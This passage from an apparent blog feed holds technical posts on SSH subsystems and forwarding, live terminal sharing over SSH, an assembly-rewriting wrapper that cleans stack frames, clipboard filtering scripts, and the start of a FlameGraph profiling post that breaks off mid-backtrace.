In SSH, a command is a single string.\nThis is not an array of strings (argv).\nOn a UNIX-ish system, the command is usually expected to be called by the user's\nshell (\"$SHELL\" -c \"$command\"): variable expansion and globbing are applied\nby the server-side shell.

\n
ssh foo.example.com 'ls *'\nssh foo.example.com 'echo $LANG'\nssh foo.example.com 'while true; do uptime ; sleep 60 ; done'\n
\n\n\n

Subsystems

\n

A subsystem is a \u201cwell-known\u201d service running on top of SSH. It is\nidentified by a string which makes it system independent: it does not\ndepend on the user/system shell, environment (PATH), etc.

\n

With the OpenSSH client, a subsystem can be invoked with\nssh -s $subsystem_name.
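
\n

For example, this invokes the sftp subsystem by hand (essentially what the sftp client does under the hood):

\n
ssh -s foo.example.com sftp\n
\n\n\n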

\n

Subsystem names come in\ntwo forms:

\n\n

Well-known subsystem names include:

\n\n

When using a subsystem:

\n\n

With the OpenSSH server, a command can be associated with a given\nsubsystem name with a configuration entry such as:

\n
Subsystem sftp /usr/lib/openssh/sftp-server\n
\n\n\n

The command is run under the identity of the user with its own shell\n(\"$SHELL\" -c \"$command\").

\n

If you want to connect to a socket you might use:

\n
Subsystem http socat STDIO TCP:localhost:80\nSubsystem hello@example.com socat STDIO UNIX:/var/run/hello\n
\n\n\n

It is possible to use exec to avoid keeping a shell process6:

\n
Subsystem http exec socat STDIO TCP:localhost:80\nSubsystem hello@example.com exec socat STDIO UNIX:/var/run/hello\n
\n\n\n

This works but OpenSSH complains because it checks for the existence of an\nexec executable file.

\n

Forwarding channels

\n

TCP/IP Forwarding

\n

SSH has support for forwarding (either incoming or outgoing)\nTCP connections.

\n

Local forwarding is used to forward a local connection (or any\nother local stream) to a remote TCP endpoint. A channel of type\ndirect-tcpip is opened to initiate a TCP connection on the remote\nside. This is used by ssh -L, ssh -W and ssh -D.

\n
\nC \u2192 S CHANNEL_OPEN(\"direct-tcpip\", chan, \u2026, \"foo.example.com\", 9000, \"\", 0);\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\nC \u2192 S CHANNEL_DATA(chan2, \"aaa\")\n
\n\n
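
Typical client-side usage (with hypothetical host names):

\n
# Listen on local port 8080 and forward each connection to foo.example.com:80\n# through gateway.example.com:\nssh -N -L 8080:foo.example.com:80 gateway.example.com\n# Connect stdin/stdout directly to a remote TCP endpoint (handy as a ProxyCommand):\nssh -W foo.example.com:80 gateway.example.com\n
\n\n\n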

Remote forwarding is used to request to forward all incoming\nconnections on a remote port over the SSH connection. The remote side\nthen opens a new forwarded-tcpip channel for each connection. This\nis used by ssh -R.

\n
\nC \u2192 S      GLOBAL_REQUEST(\"tcpip-forward\", remote_addr, remote_port)\nC \u2190 S      REQUEST_SUCCESS(remote_port)\n    S \u2190 X  Incoming connection\nC \u2190 S      CHANNEL_OPEN(\"forwarded-tcpip\", chan, \u2026, address, port, peer_address, peer_port)\nC \u2192 S      CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\n    S \u2190 X  TCP Payload \"aaa\"\nS \u2190 X      CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

Unix socket forwarding

\n

Since OpenSSH 6.7, it is\npossible to involve (either local or remote) UNIX sockets in forwards\n(ssh -L, ssh -R, ssh -W):

\n

When the UNIX socket is on the client side, only client support is needed;\nno server-side support is required.

\n

When the UNIX socket is on the server side, both client\nand server support are needed. This uses a protocol extension\nwhich works similarly to TCP/IP forwarding:

\n\n
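
Example usage (with hypothetical socket paths):

\n
# Forward local TCP port 8080 to the UNIX socket /var/run/hello on the server:\nssh -N -L 8080:/var/run/hello gateway.example.com\n# Expose the local UNIX socket /var/run/hello as /tmp/hello.sock on the server:\nssh -N -R /tmp/hello.sock:/var/run/hello gateway.example.com\n
\n\n\n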

TUN/TAP Forwarding

\n

As an extension, OpenSSH has support for tunnel forwarding. A tunnel\ncan be either IP-based (TUN devices) or Ethernet-based (TAP devices).\nAs channels do not preserve message boundaries, a header is prepended\nto each message (IP packet or Ethernet frame respectively): this\nheader contains the message length (and, for IP-based tunnels, the address family).

\n

This is used by ssh -w.

\n

Messages for an IP tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, POINTOPOINT, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ip_packet)\n
\n\n

and the packets use the form:

\n
4B  packet length\n4B  address family (SSH_TUN_AF_INET or SSH_TUN_AF_INET6)\nvar data\n
\n\n\n

Messages for an Ethernet tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, ETHERNET, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ethernet_frame)\n
\n\n

and the packets use the form:

\n
4B  packet length\nvar data\n
\n\n\n

X11 forwarding

\n

The x11 channel type is used for\nX11 forwarding.

\n

Examples of applications working over SSH

\n

SCP

\n

scp uses SSH to spawn a remote-side scp process. This remote scp\nprocess communicates with the local instance using its stdin and\nstdout.

\n

When the local scp sends data, it spawns:

\n
scp -t /some_path/\n
\n\n\n

When the local scp receives data, it spawns:

\n
scp -f /some_path/some_file\n
\n\n\n

rsync

\n

rsync can work over SSH. In this mode of operation, it uses SSH to\nspawn a server rsync process which communicates with the local instance\nthrough its stdin and stdout.

\n

The local rsync spawns something like this on the remote side:

\n
rsync --server -e.Lsfx . /some_path/\n
\n\n\n

SFTP

\n

SFTP is a file transfer protocol.\nIt is expected to work on top of SSH\nusing the sftp subsystem. However, it can work on top of other streams\n(see sftp -S $program and sftp -D $program).

\n

This is not FTP running over SSH.

\n

FISH

\n

FISH\nis another solution for file system operations over a\nremote shell (such as rsh or ssh): it uses exec sessions to\nexecute standard UNIX commands on the remote side in order to do the\noperations. This first approach will not work if the remote side is\nnot a UNIXish system: in order to support non-UNIX systems, it also\nencodes the same requests as special comments at the beginning of the\ncommand.

\n

Git

\n

Git spawns a remote git-upload-pack /some_repo/ which communicates\nwith the local instance using its standard I/O.
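
\n

A fetch from an SSH remote thus boils down to something like (hypothetical host):

\n
ssh git.example.com \"git-upload-pack '/some_repo/'\"\n
\n\n\n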

\n

Systemd

\n

Many systemd *ctl tools (hostnamectl, busctl, localectl,\ntimedatectl, loginctl, systemctl) have builtin support for\nconnecting to a remote host. They use a ssh -xT $user@$host\nsystemd-stdio-bridge. This\ntool connects to the D-Bus\nsystem bus\n(i.e. ${DBUS_SYSTEM_BUS_ADDRESS:-/var/run/dbus/system_bus_socket}).
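
\n

For example (hypothetical host):

\n
# Runs \"ssh -xT root@foo.example.com systemd-stdio-bridge\" behind the scenes:\nsystemctl -H root@foo.example.com status ssh.service\n
\n\n\n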

\n

Summary

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Program | Solution
scp | Command (scp)
rsync | Command (rsync)
sftp | Subsystem (sftp)
FISH | Commands / special comments
git | Command (git-upload-pack)
systemd | Command (systemd-stdio-bridge)
\n

Comparison of the different solutions for protocol transport

\n

Which solution should be used to export your own\nprotocol over SSH? The shell, X11 forwarding and TUN/TAP forwarding\nare not really relevant in this context so we're left with:

\n\n

Convenience

\n

Using a dedicated subsystem is the cleanest solution.\nThe subsystem feature of SSH has been designed for this kind of application:\nit's supposed to hide implementation details such as the shell,\nPATH, whether the service is exposed as a socket or a command,\nwhat the location of the socket is,\nwhether socat is installed on the system, etc.\nHowever with OpenSSH, installing a new subsystem is done by adding a new entry\nin the /etc/ssh/sshd_config file, which is not so convenient for packaging\nand not necessarily ideal for configuration management.\nAn Include directive was added for ssh_config\n(client configuration) in OpenSSH 7.3: the same directive for sshd_config\nwould probably be useful in this context.\nIn practice, the subsystem feature seems to be mostly used by sftp.

\n

Using a command is the simplest solution: the only requirement is to\nadd a suitable executable, preferably in the PATH. Moreover,\nusers can add their own commands (or override the system ones) for their\nown purposes by adding executables to their own PATH.

\n

These two solutions have a few extra features which are not really\nnecessary when used as a pure stream transport protocol but might be\nhandy:

\n\n

The two forwarding solutions have fewer features which are more in\nline with what's expected of a stream transport but:

\n\n

Authentication and authorization

\n

The command and subsystem solutions run code with the user's identity\nand will by default run with the user permissions. The setuid and\nsetgid bits might be used if this is not suitable.

\n

Another solution is to use socat or netcat to connect to a socket and get\nthe same behavior as socket forwarding (security-wise).

\n

For Unix socket forwarding, OpenSSH uses the user identity to connect\nto the socket. The daemon can use SO_PEERCRED (on Linux, OpenBSD),\ngetpeereid()\n(on BSD),\ngetpeerucred()\n(Solaris) to get the user UID, GID in order to avoid a second\nauthentication. On Linux, file-system permissions can be used to\nrestrict the access to the socket as well.

\n

For TCP socket forwarding, OpenSSH uses the user identity to connect to\nthe socket and ident (on localhost) might be used in order to get\nthe user identity but this solution is not very pretty.

\n

Conclusion

\n

I kind-of like the subsystem feature even if it's not used that much.

\n

The addition of an Include directive in sshd_config might help deploying\nsuch services. Another interesting feature would be an option to associate a\nsubsystem with a Unix socket (without having to rely on socat).

\n

References

\n\n
\n
\n
    \n
  1. \n

    The receiver uses the\nSSH_MSG_CHANNEL_WINDOW_ADJUST\nmessage to request more data.\u00a0\u21a9

    \n
  2. \n

    The random padding is used to make the whole Binary Packet Protocol message\na multiple of the cipher block size (or 8 if the block size is smaller).\u00a0\u21a9

    \n
  3. \n

    This is used to transport both stdout (SSH_MSG_CHANNEL_DATA(channel, data))\nand stderr (SSH_MSG_CHANNEL_EXTENDED_DATA(channel, SSH_EXTENDED_DATA_STDERR, data))\nover the same session channel.\u00a0\u21a9

    \n
  4. \n

    Each channel is associated with two integer IDs, one for each side\nof the connection.\u00a0\u21a9

    \n
  5. \n

    It is currently not yet registered but it is described in the SFTP\ndrafts\nand widely deployed.\u00a0\u21a9

    \n
  6. \n

    bash already does an implicit exec when bash -c\n\"$a_single_command\" is used.\u00a0\u21a9

    \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "title": "Terminal read-only live sharing", "url": "https://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "date_published": "2016-10-18T00:00:00+02:00", "date_modified": "2017-05-06T00:00:00+02:00", "tags": ["computer", "unix", "ssh", "screen"], "content_html": "

Live sharing a terminal session to another (shared) host over SSH in\nread-only mode.

\n

Update 2017-05-06: added broadcasting over the web with\nnode-webterm

\n

TLDR

\n
#!/bin/sh\n\nhost=\"$1\"\n\nfile=script.log\ntouch \"$file\"\ntail -f $file | ssh $host 'cat > script.log' &\nscript -f \"$file\"\nkill %1\nssh $host \"rm $file\"\nrm \"$file\"\n
\n\n\n

Using screen

\n

screen can save the content of the screen session to a file. This is\nenabled with the following screen commands:

\n
logfile screen.log\nlogfile flush 0\nlog on\n
\n\n\n

The logfile flush 0 command removes the buffering delay in screen\nin order to reduce the latency.
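
\n

These commands can be typed at the screen command prompt (C-a :), put in ~/.screenrc, or sent to an already running session from the outside, e.g. (assuming the session is named shared):

\n
screen -S shared -X logfile screen.log\nscreen -S shared -X logfile flush 0\nscreen -S shared -X log on\n
\n\n\n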

\n

We can watch the session locally (from another terminal) with:

\n
tail -f screen.log\n
\n\n\n

This might produce some garbage if the original and target terminals are not\ncompatible (echo $TERM is different) or if the terminal sizes are different:

\n\n

Instead of watching it locally, we want to send the content to another (shared)\nhost over SSH:

\n
tail -f screen.log | ssh $server 'cat > /tmp/logfile'\n
\n\n\n

Other users can now watch the session on the remote host with:

\n
tail -f /tmp/logfile\n
\n\n\n

Using xterm

\n

You can create a log file from xterm:

\n
xterm -l -lf xterm.log\n
\n\n\n

The rest of the technique applies unchanged.

\n

Best viewed from an xterm-compatible terminal.

\n

Using script

\n

script can be used to create a log file as well:

\n
script -f script.log\n
\n\n\n

Downsides

\n

The downside is that a log file is created on both the local and server side.\nThis file might grow (especially if you broadcast\nnyancat \"\ud83d\ude38\" for a long time)\nand needs to be cleaned up afterwards.

\n

A FIFO might be used instead of a log file with some programs. It\nworks with screen and script but not with xterm. However, I\nexperienced quite a few broken pipes (and associated brokenness) when\ntrying to use this method. Moreover, using a FIFO can probably stall\nsome terminals if the consumer does not consume the data fast enough.

\n

Broadcast service

\n

In order to avoid the remote log file, a solution is to set up a terminal\nbroadcast service. A local terminal broadcast service can be set up with:

\n
socat UNIX-LISTEN:script.socket,fork SYSTEM:'tail -f script.log'\n
\n\n\n

And we can watch it with:

\n
socat STDIO UNIX-CONNECT:script.socket\n
\n\n\n

We can expose this service to a remote host over SSH:

\n
ssh $server -R script.socket:script.socket -N\n
\n\n\n

The downside of this approach is that the content is transferred over\nSSH once per viewer instead of only once.

\n

Web broadcast

\n

node-webterm can be used to\nbroadcast the log over HTTP:

\n
{\n    \"login\": \"tail -f script.log\",\n    \"port\": 3000,\n    \"interface\": \"127.0.0.1\",\n    \"input\": true\n}\n
\n\n\n

This displays the terminal in the browser using\nterminal.js, a JavaScript\nxterm-compatible terminal emulator (executing client-side).\nThe default terminal size is the same as the default xterm size.\nIt can be configured in index.html.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-by-filtering-the-assembly/", "title": "Cleaning the stack by filtering the assembly", "url": "https://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-by-filtering-the-assembly/", "date_published": "2014-10-06T00:00:00+02:00", "date_modified": "2014-10-06T00:00:00+02:00", "tags": ["computer", "simgrid", "unix", "compilation", "assembly", "x86_64"], "content_html": "

In order to help the SimGridMC state comparison code, I wrote a\nproof-of-concept LLVM pass which cleans each stack\nframe before using\nit. However, SimGridMC currently does not work properly when compiled\nwith clang/LLVM. We can do the same thing by pre-processing the\nassembly generated by the compiler before passing it to the assembler:\nthis is done by inserting a script between the compiler and the\nassembler. This script will rewrite the generated assembly by\nprepending stack-cleaning code at the beginning of each function.

\n

Table of Contents

\n
\n\n
\n

Summary

\n

In a typical compilation process, the compiler (here cc1) reads the\ninput source file and generates assembly. This assembly is then passed\nto the assembler (as) which generates native binary code:

\n
cat foo.c | cc1  | as      > foo.o\n#         \u2191      \u2191         \u2191\n#         Source Assembly  Native\n
\n\n\n

We can achieve our goal without depending on LLVM by adding a simple\nassembly-rewriting script to this pipeline, between the compiler\nand the assembler:

\n
cat foo.c | cc1  | clean-stack-filter | as     > foo.o\n#         \u2191      \u2191                    \u2191        \u2191\n#         Source Assembly             Assembly Native\n
\n\n\n

By doing this, our modification can be used with any compiler, as long\nas it sends assembly to an external assembler instead of generating\nthe native binary code directly.

\n

This will be done in three components:

\n\n

Assembly rewriting script

\n

The first step is to write a simple UNIX program taking as input the\nassembly code of a source file and adding a stack-cleaning\npre-prologue to each function in its output.

\n

Here is the generated assembly for the test function of the previous\nepisode (compiled with GCC):

\n
main:\n.LFB0:\n    .cfi_startproc\n    subq    $40, %rsp\n    .cfi_def_cfa_offset 48\n    movl    %edi, 12(%rsp)\n    movq    %rsi, (%rsp)\n    movl    $42, 28(%rsp)\n    movl    $0, %eax\n    call    f\n    movl    $0, %eax\n    addq    $40, %rsp\n    .cfi_def_cfa_offset 8\n    ret\n    .cfi_endproc\n
\n\n\n

We can use .cfi_startproc to find the beginning of a function and\neach pushq and subq $x, %rsp instruction to estimate the stack\nsize used by this function (excluding the red zone and alloca() as\npreviously). Each time we see the beginning of a function, we\nneed to buffer each line until we are ready to emit the stack-cleaning\ncode.

\n
#!/usr/bin/perl -w\n# Transform assembly in order to clean each stack frame for X86_64.\n\nuse strict;\n$SIG{__WARN__} = sub { die @_ };\n\n# Whether we are still scanning the content of a function:\nour $scanproc = 0;\n\n# Save lines of the function:\nour $lines = \"\";\n\n# Size of the stack for this function:\nour $size = 0;\n\n# Counter for assigning unique ids to labels:\nour $id=0;\n\nsub emit_code {\n    my $qsize = $size / 8;\n    my $offset = - $size - 8;\n\n    if($size != 0) {\n      print(\"\\tmovabsq \\$$qsize, %r11\\n\");\n      print(\".Lstack_cleaner_loop$id:\\n\");\n      print(\"\\tmovq    \\$0, $offset(%rsp,%r11,8)\\n\");\n      print(\"\\tsubq    \\$1, %r11\\n\");\n      print(\"\\tjne     .Lstack_cleaner_loop$id\\n\");\n    }\n\n    print $lines;\n\n    $id = $id + 1;\n    $size = 0;\n    $lines = \"\";\n    $scanproc = 0;\n}\n\nwhile (<>) {\n  if ($scanproc) {\n      $lines = $lines . $_;\n      if (m/^[ \\t]*.cfi_endproc$/) {\n      emit_code();\n      } elsif (m/^[ \\t]*pushq/) {\n      $size += 8;\n      } elsif (m/^[ \\t]*subq[\\t *]\\$([0-9]*),[ \\t]*%rsp$/) {\n          my $val = $1;\n          $val = oct($val) if $val =~ /^0/;\n          $size += $val;\n          emit_code();\n      }\n  } elsif (m/^[ \\t]*.cfi_startproc$/) {\n      print $_;\n\n      $scanproc = 1;\n  } else {\n      print $_;\n  }\n}\n
\n\n\n

This is used as:

\n
# Use either of:\nclean-stack-filter < helloworld.s\ngcc -o- -S helloworld.c | clean-stack-filter | gcc -x assembler - -r -o helloworld\n
\n\n\n

And this produces:

\n
main:\n.LFB0:\n    .cfi_startproc\n    movabsq $5, %r11\n.Lstack_cleaner_loop0:\n    movq    $0, -48(%rsp,%r11,8)\n    subq    $1, %r11\n    jne     .Lstack_cleaner_loop0\n    subq    $40, %rsp\n    .cfi_def_cfa_offset 48\n    movl    %edi, 12(%rsp)\n    movq    %rsi, (%rsp)\n    movl    $42, 28(%rsp)\n    movl    $0, %eax\n    call    f\n    movl    $0, %eax\n    addq    $40, %rsp\n    .cfi_def_cfa_offset 8\n    ret\n    .cfi_endproc\n
\n\n\n

Assembler wrapper

\n

A second step is to write an extended assembler as program which\naccepts an extra argument --filter my_shell_command. We could\nhardcode the filtering script in this wrapper but a generic assembler\nwrapper might be reused somewhere else.

\n

We need to:

\n
    \n
  1. \n

    interpret a part of the as command line arguments and our extra\n argument;

    \n
  2. \n
  3. \n

    apply the specified filter on the input assembly;

    \n
  4. \n
  5. \n

    pass the resulting assembly to the real assembler.

    \n
  6. \n
\n
#!/usr/bin/ruby\n# Wrapper around the real `as` which adds filtering capabilities.\n\nrequire \"tempfile\"\nrequire \"fileutils\"\n\ndef wrapped_as(argv)\n\n  args=[]\n  input=nil\n  as=\"as\"\n  filter=\"cat\"\n\n  i = 0\n  while i<argv.size\n    case argv[i]\n\n    when \"--as\"\n      as = argv[i+1]\n      i = i + 1\n    when \"--filter\"\n      filter = argv[i+1]\n      i = i + 1\n\n    when \"-o\", \"-I\"\n      args.push(argv[i])\n      args.push(argv[i+1])\n      i = i + 1\n    when /^-/\n      args.push(argv[i])\n    else\n      if input\n        exit 1\n      else\n        input = argv[i]\n      end\n    end\n    i = i + 1\n  end\n\n  if input==nil\n    # We dont handle pipe yet:\n    exit 1\n  end\n\n  # Generate temp file\n  tempfile = Tempfile.new(\"as-filter\")\n  unless system(filter, 0 => input, 1 => tempfile)\n    status=$?.exitstatus\n    FileUtils.rm tempfile\n    exit status\n  end\n  args.push(tempfile.path)\n\n  # Call the real assembler:\n  res = system(as, *args)\n  status = if res != nil\n             $?.exitstatus\n           else\n             1\n           end\n  FileUtils.rm tempfile\n  exit status\n\nend\n\nwrapped_as(ARGV)\n
\n\n\n

This is used like this:

\n
tools/as --filter \"sed s/world/abcde/\" helloworld.s\n
\n\n\n

We can now ask the compiler to use our assembler wrapper instead of\nthe real system assembler:

\n\n
gcc -B tools/ -Wa,--filter,'sed s/world/abcde/' \\\n  helloworld.c -o helloworld-modified-gcc\n
\n\n\n
clang -no-integrated-as -B tools/ -Wa,--filter,'sed s/world/abcde/' \\\n  helloworld.c -o helloworld-modified-clang\n
\n\n\n

Which produces:

\n
\n$ ./helloworld\nHello world!\n$ ./helloworld-modified-gcc\nHello abcde!\n$ ./helloworld-modified-clang\nHello abcde!\n
\n\n

By combining the two tools, we can get a compiler with stack-cleaning enabled:

\n
gcc -B tools/  -Wa,--filter,'clean-stack-filter' \\\n  helloworld.c -o helloworld\n
\n\n\n

Compiler wrapper

\n

Now we can write compiler wrappers which do this job automatically:

\n
#!/bin/sh\npath=$(dirname \"$0\")\nexec gcc -B \"$path\" -Wa,--filter,\"$path\"/clean-stack-filter \"$@\"\n
\n\n\n
#!/bin/sh\npath=$(dirname \"$0\")\nexec g++ -B \"$path\" -Wa,--filter,\"$path\"/clean-stack-filter \"$@\"\n
\n\n\n
\n

Warning

\n

As the assembly modification is implemented in as,\nthis compiler wrapper will output the unmodified assembly when using\ncc -S, which can be surprising. You need to objdump the .o file in\norder to see the effect of the filter.
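
\n

For example (assuming the wrapper above is installed as tools/cc):

\n
tools/cc -c helloworld.c -o helloworld.o\nobjdump -d helloworld.o | less\n
\n\n\n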

\n
\n

Result

\n

The whole test suite of SimGrid with model-checking works with this\nimplementation. The next step is to see the impact of this\nmodification on the state comparison of SimGridMC.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/09/25/filtering-the-clipboard/", "title": "Filtering the clipboard using UNIX filters", "url": "https://www.gabriel.urdhr.fr/2014/09/25/filtering-the-clipboard/", "date_published": "2014-09-25T00:00:00+02:00", "date_modified": "2014-09-25T00:00:00+02:00", "tags": ["computer", "x11", "unix", "cms", "hmtl"], "content_html": "

I had a few Joomla posts that I wanted to clean up semi-automatically.\nHere are a few scripts to pass the content of the clipboard (or the\ncurrent selection) through a UNIX filter.

\n

Filter for cleaning HTML posts

\n

Cleaning up the (HTML) content of the posts was quite time consuming\nand very repetitive:

\n\n

Most of the job could be done by a script\n(cleanup_html):

\n
#!/usr/bin/env ruby\n# Remove some crap from HTMl snippets.\n\nrequire \"nokogiri\"\n\nif (ARGV[0])\n  html = File.read(ARGV[0])\nelse\n  html = $stdin.read\nend\ndoc = Nokogiri::HTML::DocumentFragment.parse html\n\n# Remove 'style':\ndoc.css(\"*[style]\").each do |node|\n  style = node.attribute(\"style\")\n  node.remove_attribute(\"style\")\n  $stderr.puts \"Removed style: #{style}\\n\"\nend\n\n# Remove useless span:\ndoc.css(\"span\").each do |span|\n  $stderr.puts \"Unwrapping span: #{span}\\n\"\n  span.children.each do |x|\n    span.before(x)\n  end\n  span.remove\nend\n\n# Split paragraphs on <br/>:\ndoc.css(\"p > br\").each do |br|\n  p = br.parent\n\n  # Clone\n  new_p = p.document.create_element(\"p\")\n  p.children.take_while{ |x| x!=br }.each do |x|\n    new_p.add_child x\n  end\n  p.before(new_p)\n\n  br.remove\nend\n\n# Remove empty paragraphs:\ndoc.css(\"p\").each do |node|\n  if node.element_children.empty? && /\\A *\\z/.match(node.inner_text)\n    node.remove\n  end\nend\n\nprint doc.to_html\n
\n\n\n

Filtering the clipboard or selection

\n

I wanted to do a semi-automatic update in order to have feedback on\nwhat was happening and fix the remaining issues straightaway. To do\nthis, the filter can be applied on the X11 clipboard:

\n
#!/bin/sh\nxclip -out -selection clipboard | filter_html | xclip -in -selection clipboard\n
\n\n\n

It is even possible to do it on the current selection:

\n
#!/bin/sh\nsleep 0.1\nxdotool key control+c\nsleep 0.1\nxclip -out -selection clipboard | filter_html | xclip -in -selection clipboard\nxdotool key control+v\n
\n\n\n

This second script is quite hackish but it kind of works:

\n\n

This can be generalized with this script (gui_filter):

\n
#!/bin/sh\n\nmode=\"$1\"\nshift\n\ncase \"$mode\" in\n    primary | secondary | clipboard)\n        xclip -out -selection \"$mode\" | command \"$@\" | xclip -in -selection \"$mode\"\n        ;;\n    selection)\n        # This is a horrible hack.\n        # It only works for C-c/C-v keybindings.\n        sleep 0.1\n        xdotool key control+c\n        sleep 0.1\n        xclip -out -selection clipboard | command \"$@\" | xclip -in -selection clipboard\n        xdotool key control+v\n        ;;\nesac\n
\n\n\n

Called with:

\n
# Clean the HTML markup in the clipboard:\ngui_filter clipboard html_filter\n\n# Base-64 encode the current selection:\ngui_filter selection base64\n\n# Base-64 decode the current selection:\ngui_filter selection base64 -d\n
\n\n\n

Binding it to a key

\n

Now we can bind this command to a temporary global hotkey with this\nscript based on the keybinder library:

\n
#!/usr/bin/env python\n# Bind a global hotkey to a given command.\n# Examples:\n#   keybinder '<Ctrl>e' gui_filter selection base64\n#   keybinder '<Ctrl>X' xterm\n\nimport sys\nimport gi\nimport os\nimport signal\n\ngi.require_version('Keybinder', '3.0')\nfrom gi.repository import Keybinder\nfrom gi.repository import Gtk\n\ndef callback(x):\n    os.spawnvp(os.P_NOWAIT, sys.argv[2], sys.argv[2:])\n\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\nGtk.init()\nKeybinder.init()\nKeybinder.bind(sys.argv[1], callback);\nGtk.main()\n
\n\n\n

The hotkey is active as long as the keybinder process is not killed.
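For example, a minimal way to keep the binding around only while it is needed (gui_filter and cleanup_html are the scripts defined above):
\n
# Bind the hotkey for the current session and remove it when done:\nkeybinder '<Ctrl>e' gui_filter selection cleanup_html &\nkeybinder_pid=$!\n# ... use <Ctrl>e on a few selections, then:\nkill \"$keybinder_pid\"\n
\n\n\n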

\n

Conclusion

\n
keybinder '<Ctrl>e' gui_filter selection cleanup_html\nkeybinder '<Ctrl>e' gui_filter selection kramdown\nkeybinder '<Ctrl>e' gui_filter selection cowsay\nkeybinder '<Ctrl>e' gui_filter selection sort\n\n# More dangerous:\nkeybinder '<Ctrl>e' gui_filter clipboard bash\nkeybinder '<Ctrl>e' gui_filter clipboard ruby\nkeybinder '<Ctrl>e' gui_filter clipboard python\n
\n\n\n

Other solutions

\n

With Emacs

\n

In Emacs, the shell-command-on-region command (bound to\nM-|) can be used to pass the current selection to a given\ncommand: by default the output of the command is displayed in a\nseparate buffer. Alternatively, C-u M-| can be used to replace\nthe selection with the output.

\n

With Vim

\n

In Vim, the ! command can be used to pass a given part of the\ncurrent buffer through a shell filter: for example, :%!cleanup_html\nfilters the whole buffer and :'<,'>!sort filters the current\nvisual selection.

\n

With atom

\n

Atom can filter the current selection through a pipe\nwith the pipe package.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/05/23/flamegraph/", "title": "Profiling and optimising with Flamegraph", "url": "https://www.gabriel.urdhr.fr/2014/05/23/flamegraph/", "date_published": "2014-05-23T00:00:00+02:00", "date_modified": "2014-05-23T00:00:00+02:00", "tags": ["simgrid", "optimisation", "profiling", "computer", "flamegraph", "unix", "gdb", "perf"], "content_html": "

FlameGraph\nis a tool which generates SVG graphics\nto visualise stack-sampling based\nprofiles. It processes data collected with tools such as Linux perf,\nSystemTap or DTrace.

\n

For the impatient:

\n\n

Table of Contents

\n
\n\n
\n

Profiling by sampling the stack

\n

The idea is that in order to know where your application is spending CPU\ntime, you should sample its stack. You can get one sample of the\nstack(s) of a process with GDB:

\n
# Sample the stack of the main (first) thread of a process:\ngdb -ex \"set pagination 0\" -ex \"bt\" -batch -p $(pidof okular)\n\n# Sample the stack of all threads of the process:\ngdb -ex \"set pagination 0\" -ex \"thread apply all bt\" -batch -p $(pidof okular)\n
\n\n\n

This generates backtraces such as:

\n
[...]\nThread 2 (Thread 0x7f4d7bd56700 (LWP 15156)):\n#0  0x00007f4d9678b90d in poll () from /lib/x86_64-linux-gnu/libc.so.6\n#1  0x00007f4d93374fe4 in g_main_context_poll (priority=2147483647, n_fds=2, fds=0x7f4d70002e70, timeout=-1, context=0x7f4d700009a0) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:4028\n#2  g_main_context_iterate (context=context@entry=0x7f4d700009a0, block=block@entry=1, dispatch=dispatch@entry=1, self=<optimized out>) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3729\n#3  0x00007f4d933750ec in g_main_context_iteration (context=0x7f4d700009a0, may_block=1) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3795\n#4  0x00007f4d9718b676 in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#5  0x00007f4d9715cfef in QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#6  0x00007f4d9715d2e5 in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#7  0x00007f4d97059bef in QThread::exec() () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#8  0x00007f4d9713e763 in ?? () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#9  0x00007f4d9705c2bf in ?? () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#10 0x00007f4d93855062 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0\n#11 0x00007f4d96796c1d in clone () from /lib/x86_64-linux-gnu/libc.so.6\n\nThread 1 (Thread 0x7f4d997ab780 (LWP 15150)):\n#0  0x00007f4d9678b90d in poll () from /lib/x86_64-linux-gnu/libc.so.6\n#1  0x00007f4d93374fe4 in g_main_context_poll (priority=2147483647, n_fds=8, fds=0x2f8a940, timeout=1998, context=0x1c747e0) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:4028\n#2  g_main_context_iterate (context=context@entry=0x1c747e0, block=block@entry=1, dispatch=dispatch@entry=1, self=<optimized out>) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3729\n#3  0x00007f4d933750ec in g_main_context_iteration (context=0x1c747e0, may_block=1) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3795\n#4  0x00007f4d9718b655 in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#5  0x00007f4d97c017c6 in ?? () from /usr/lib/x86_64-linux-gnu/libQtGui.so.4\n#6  0x00007f4d9715cfef in QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#7  0x00007f4d9715d2e5 in 